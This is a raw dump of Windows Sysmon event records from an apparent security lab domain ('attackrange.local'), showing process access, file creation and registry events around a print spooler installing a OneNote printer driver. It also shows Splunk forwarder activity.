14:55:55.465{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049852Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:55.465{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EB7B-607E-DC06-00000000BB01}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049851Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:55.465{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB7B-607E-DC06-00000000BB01}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049850Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:55.466{85C0FFC9-EB7B-607E-DC06-00000000BB01}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049849Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:55.324{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB586D7CF6E972109DEF6F6821B83EB0,SHA256=5A02E809EAC3FA73C445B33F7C4C4B1D44BA8BDC2D4CF46B6FD78310C388B0F3,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000072190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-DriverVerSetValue2021-04-20 14:55:56.985{A7A01FEF-B636-607E-2500-00000000BB01}3032C:\Windows\System32\spoolsv.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\OneNote (Desktop)\DsDriver\driverVersionDWORD (0x00000401) 23542300x800000000000000072189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.907{A7A01FEF-B636-607E-2500-00000000BB01}3032NT AUTHORITY\SYSTEMC:\Windows\System32\spoolsv.exeC:\Windows\Temp\9D92FDEC-5194-4052-8F8A-28B8A83158EDMD5=9F2932366C24E3C8BD47F57B423D9CAD,SHA256=00F374EB2A4A3D70A34B82890AC68FE49448D581AEB6D0FDA1E9DA01BF4104ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.907{A7A01FEF-B636-607E-2500-00000000BB01}3032NT AUTHORITY\SYSTEMC:\Windows\System32\spoolsv.exeC:\Windows\Temp\80AC3A9B-E01C-4889-9FFF-71C283708D50MD5=824393EF50ACD60ED14B2C26F8C1D4EE,SHA256=3E34B36B3547A7E8A135AB5144AE7403756E7BDF64969F260829AE8D8FEC9734,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.907{A7A01FEF-B636-607E-2500-00000000BB01}3032NT AUTHORITY\SYSTEMC:\Windows\System32\spoolsv.exeC:\Windows\Temp\49C2C6BC-92B2-49C7-B847-A9FD71CDAC40MD5=8470717E7DAEE5D4C34F7EF2656C9479,SHA256=6C0EE6FC5FADC904E5FC9199D89EBC32A1D912DC265709F10186B3FB40CAFC58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.907{A7A01FEF-B636-607E-2500-00000000BB01}3032NT AUTHORITY\SYSTEMC:\Windows\System32\spoolsv.exeC:\Windows\Temp\2122387B-729E-4628-BD3E-0EAA90BF902CMD5=824393EF50ACD60ED14B2C26F8C1D4EE,SHA256=3E34B36B3547A7E8A135AB5144AE7403756E7BDF64969F260829AE8D8FEC9734,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.907{A7A01FEF-B636-607E-2500-00000000BB01}3032NT AUTHORITY\SYSTEMC:\Windows\System32\spoolsv.exeC:\Windows\Temp\27CA34FB-40A3-4897-BB79-CF1810E0F3AEMD5=0E975ED2711DAC213EB4BA7AF79F6FCD,SHA256=614A2D530700F6357C864E7F305005482E6F1BC12BC41DF555A248DEAD1851AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000072184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.876{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2500-00000000BB01}3032C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.860{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2500-00000000BB01}3032C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.860{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2500-00000000BB01}3032C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000072181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-DriverVerSetValue2021-04-20 14:55:56.860{A7A01FEF-B636-607E-2500-00000000BB01}3032C:\Windows\System32\spoolsv.exeHKLM\System\CurrentControlSet\Control\Print\Environments\Windows x64\Drivers\Version-4\Send to Microsoft OneNote 16 Driver\DriverVersion16.0.7629.4000 11241100x800000000000000072180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.844{A7A01FEF-B636-607E-2500-00000000BB01}3032C:\Windows\System32\spoolsv.exeC:\Windows\System32\DriverStore\FileRepository\prnms006.inf_amd64_c3bdcb6fc975b614\prnms006.PNF2021-04-20 14:55:56.844 23542300x800000000000000072179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.844{A7A01FEF-EB7C-607E-900B-00000000BB01}5132NT AUTHORITY\SYSTEMC:\Windows\system32\DrvInst.exeC:\Windows\System32\DriverStore\Temp\{758a7cc5-0dda-034c-b284-53b68ff830ce}\SendToOneNoteNames.gpdMD5=5047CEC9C08AA6B6CE46BDACCEFE986A,SHA256=551FED688509A5D587AB0082E1E612FC7D2485595F2B55BC300FDC5F83BB036B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.829{A7A01FEF-EB7C-607E-900B-00000000BB01}5132NT AUTHORITY\SYSTEMC:\Windows\system32\DrvInst.exeC:\Windows\System32\DriverStore\Temp\{758a7cc5-0dda-034c-b284-53b68ff830ce}\SendToOneNoteFilter.dllMD5=3662BF5C56E4DF7FEBDC3CFD08E9E4D5,SHA256=21BBCC0E7193755159A1D841BB6EE9A580A0FA4F1BBE95B4C2C36C118BCDF012,IMPHASH=AB24A902F724D73A3FC0AAF53CD78A28truetrue 23542300x800000000000000072177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.829{A7A01FEF-EB7C-607E-900B-00000000BB01}5132NT AUTHORITY\SYSTEMC:\Windows\system32\DrvInst.exeC:\Windows\System32\DriverStore\Temp\{758a7cc5-0dda-034c-b284-53b68ff830ce}\SendToOneNote.gpdMD5=9D77694DAF3D4E5073633D0DAF5CD720,SHA256=B1B5E571607D91B5E1611E1310238C83F4E219C02AFF47608C289FE01D9C2D4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.829{A7A01FEF-EB7C-607E-900B-00000000BB01}5132NT AUTHORITY\SYSTEMC:\Windows\system32\DrvInst.exeC:\Windows\System32\DriverStore\Temp\{758a7cc5-0dda-034c-b284-53b68ff830ce}\SendToOneNote-pipelineconfig.xmlMD5=D7EF893DB4590A85390F72194D40C0B0,SHA256=5B437FD2A956337F71E8E69E9231D844F95BD5C6420DDF0C0155624E7D7168A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.829{A7A01FEF-EB7C-607E-900B-00000000BB01}5132NT AUTHORITY\SYSTEMC:\Windows\system32\DrvInst.exeC:\Windows\System32\DriverStore\Temp\{758a7cc5-0dda-034c-b284-53b68ff830ce}\SendToOneNote-manifest.iniMD5=91CE083419EBD92711946F7525E61835,SHA256=30AD3DDC45EFB0EC9D2557CBD226E522F2CA78C40A10CF7576B437F7F735EA38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.829{A7A01FEF-EB7C-607E-900B-00000000BB01}5132NT AUTHORITY\SYSTEMC:\Windows\system32\DrvInst.exeC:\Windows\System32\DriverStore\Temp\{758a7cc5-0dda-034c-b284-53b68ff830ce}\prnSendToOneNote.catMD5=46617152A7D964CF3532EE008A4EAA19,SHA256=C73BE7A5E5B3D641EDD93AAD497B0C1AD0587AD9998F166229FCDC02668C481B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.829{A7A01FEF-EB7C-607E-900B-00000000BB01}5132NT AUTHORITY\SYSTEMC:\Windows\system32\DrvInst.exeC:\Windows\System32\DriverStore\Temp\{758a7cc5-0dda-034c-b284-53b68ff830ce}\prnms006.infMD5=F6BBD70FA6229EAC8AF2B7D62BDB2BB8,SHA256=378C6DA2C15D79A8F79EFF3AA4F5F13AE64EB9B760DC061E5A488992A1D874D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.829{A7A01FEF-B626-607E-1400-00000000BB01}1276NT AUTHORITY\NETWORK SERVICEC:\Windows\system32\svchost.exeC:\Windows\System32\CatRoot\TMP7992.tmpMD5=2B4C69D5D50B1103932A6AD88103A7E3,SHA256=0DA27E6D280D8D42CD0659E5E8F45B143DAB5415EB4FCB883E5FDD57CBA8FB76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.829{A7A01FEF-B626-607E-1400-00000000BB01}1276NT AUTHORITY\NETWORK SERVICEC:\Windows\system32\svchost.exeC:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem22.CATMD5=2B4C69D5D50B1103932A6AD88103A7E3,SHA256=0DA27E6D280D8D42CD0659E5E8F45B143DAB5415EB4FCB883E5FDD57CBA8FB76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.797{A7A01FEF-B626-607E-1400-00000000BB01}1276NT AUTHORITY\NETWORK SERVICEC:\Windows\system32\svchost.exeC:\Windows\System32\CatRoot\TMP7992.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000072169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.766{A7A01FEF-EB7C-607E-900B-00000000BB01}5132C:\Windows\system32\DrvInst.exeC:\Windows\System32\DriverStore\drvstore.tmp2021-04-20 14:55:56.766 11241100x800000000000000072168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.766{A7A01FEF-EB7C-607E-900B-00000000BB01}5132C:\Windows\system32\DrvInst.exeC:\Windows\System32\DriverStore\FileRepository\prnms006.inf_amd64_c3bdcb6fc975b6142021-04-20 14:55:56.766 10341000x800000000000000072167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.751{A7A01FEF-B626-607E-1600-00000000BB01}15404372C:\Windows\system32\svchost.exe{A7A01FEF-EB7C-607E-910B-00000000BB01}6264C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.751{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EB7C-607E-910B-00000000BB01}6264C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.751{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EB7C-607E-910B-00000000BB01}6264C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.735{A7A01FEF-C0A3-607E-6C05-00000000BB01}36241208C:\Windows\system32\csrss.exe{A7A01FEF-EB7C-607E-910B-00000000BB01}6264C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.735{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EB7C-607E-910B-00000000BB01}6264C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.735{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EB7C-607E-910B-00000000BB01}6264C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.704{A7A01FEF-EB7C-607E-900B-00000000BB01}51324012C:\Windows\system32\DrvInst.exe{A7A01FEF-B625-607E-0C00-00000000BB01}668C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\DrvInst.exe+dc1e|C:\Windows\system32\DrvInst.exe+11cf|C:\Windows\system32\DrvInst.exe+158cd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.704{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.704{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.704{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.704{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.704{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EB7C-607E-900B-00000000BB01}5132C:\Windows\system32\DrvInst.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 